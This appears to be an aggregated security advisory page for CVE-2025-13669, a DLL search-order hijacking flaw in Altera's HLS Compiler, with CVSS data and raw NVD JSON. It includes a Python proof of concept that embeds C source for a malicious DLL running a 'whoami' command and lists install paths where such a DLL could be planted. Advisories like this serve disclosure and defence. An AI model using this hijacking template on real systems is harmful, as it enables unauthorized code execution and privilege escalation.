Security Vulnerability Report
中文
CVE-2025-13669 CVSS 6.7 MEDIUM

CVE-2025-13669

Published: 2025-12-12 03:15:52
Last Modified: 2026-01-12 15:14:33
Source: 04c0172e-9735-4a9d-a92a-fe01fa863447

Description

Uncontrolled Search Path Element vulnerability in Altera High Level Synthesis Compiler on Windows allows Search Order Hijacking.This issue affects High Level Synthesis Compiler: from 19.1 through 24.3.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:intel:high_level_synthesis_compiler:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Altera High Level Synthesis Compiler < 19.1
Altera High Level Synthesis Compiler >= 19.1 且 <= 24.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-13669 PoC - Altera HLS Compiler Search Order Hijacking Uncontrolled Search Path Element vulnerability allows Search Order Hijacking This PoC demonstrates how an attacker can exploit the search path vulnerability by placing a malicious DLL in a location that gets searched before the legitimate one. """ import os import sys import platform def create_malicious_dll_content(): """Generate the content for a malicious DLL that will be loaded instead of the legitimate one""" malicious_code = ''' #include <windows.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { if (fdwReason == DLL_PROCESS_ATTACH) { // Execute malicious code when the DLL is loaded MessageBox(NULL, "Malicious DLL Loaded via CVE-2025-13669!", "Search Order Hijacking", MB_OK | MB_ICONWARNING); // In real attack: execute payload, exfiltrate data, etc. system("whoami >> C:\\temp\\pwned.txt"); } return TRUE; } ''' return malicious_code def check_vulnerable_paths(): """Check for paths that could be exploited for DLL hijacking""" print('[*] Checking vulnerable DLL search paths...') vulnerable_paths = [] # Check common vulnerable locations paths_to_check = [ os.getcwd(), os.path.expanduser('~'), 'C:\\Program Files\\IntelSVN\\bin', 'C:\\intelFPGA\\19.1\\hls\\bin', 'C:\\intelFPGA\\20.1\\hls\\bin', 'C:\\intelFPGA\\21.1\\hls\\bin', 'C:\\intelFPGA\\22.1\\hls\\bin', 'C:\\intelFPGA\\23.1\\hls\\bin', 'C:\\intelFPGA\\24.3\\hls\\bin' ] for path in paths_to_check: if os.path.exists(path): print(f'[+] Found HLS installation path: {path}') vulnerable_paths.append(path) # Check for DLL search patterns common_dlls = ['intel_hls_compiler.dll', 'hls_runtime.dll', 'quartus.dll'] for dll in common_dlls: dll_path = os.path.join(path, dll) if os.path.exists(dll_path): print(f' [*] Found DLL: {dll_path}') return vulnerable_paths def demonstrate_exploit(): """Demonstrate the search order hijacking exploit""" print('[*] CVE-2025-13669 - Search Order Hijacking PoC') print('=' * 60) if platform.system() != 'Windows': print('[-] This exploit targets Windows systems with Altera HLS Compiler') print('[-] Current platform: ' + platform.system()) return print('[+] Target: Altera High Level Synthesis Compiler 19.1-24.3') print('[+] Vulnerability: Uncontrolled Search Path Element') vulnerable_paths = check_vulnerable_paths() if not vulnerable_paths: print('[-] No vulnerable HLS installation paths found') return print('\n[*] Attack methodology:') print(' 1. Attacker places malicious DLL in HLS search path') print(' 2. HLS Compiler loads DLL without proper path validation') print(' 3. Malicious code executes with compiler privileges') print(' 4. Attacker achieves code execution/privilege escalation') print('\n[*] Example malicious DLL placement:') for path in vulnerable_paths[:3]: fake_dll = os.path.join(path, 'intel_hls_compiler.dll') print(f' [+] Place malicious DLL at: {fake_dll}') print('\n[*] Note: This is a PoC demonstrating the vulnerability') print('[*] Actual exploitation requires compiling and deploying malicious DLL') if __name__ == '__main__': demonstrate_exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13669", "sourceIdentifier": "04c0172e-9735-4a9d-a92a-fe01fa863447", "published": "2025-12-12T03:15:51.723", "lastModified": "2026-01-12T15:14:33.050", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uncontrolled Search Path Element vulnerability in Altera High Level Synthesis Compiler on Windows allows Search Order Hijacking.This issue affects High Level Synthesis Compiler: from 19.1 through 24.3."}], "metrics": {"cvssMetricV40": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:high_level_synthesis_compiler:*:*:*:*:*:*:*:*", "versionStartIncluding": "19.1", "versionEndIncluding": "24.3", "matchCriteriaId": "EEC7D9F7-7F5B-4121-B408-415B738FEBBB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.altera.com/security/security-advisory/asa-0003", "source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.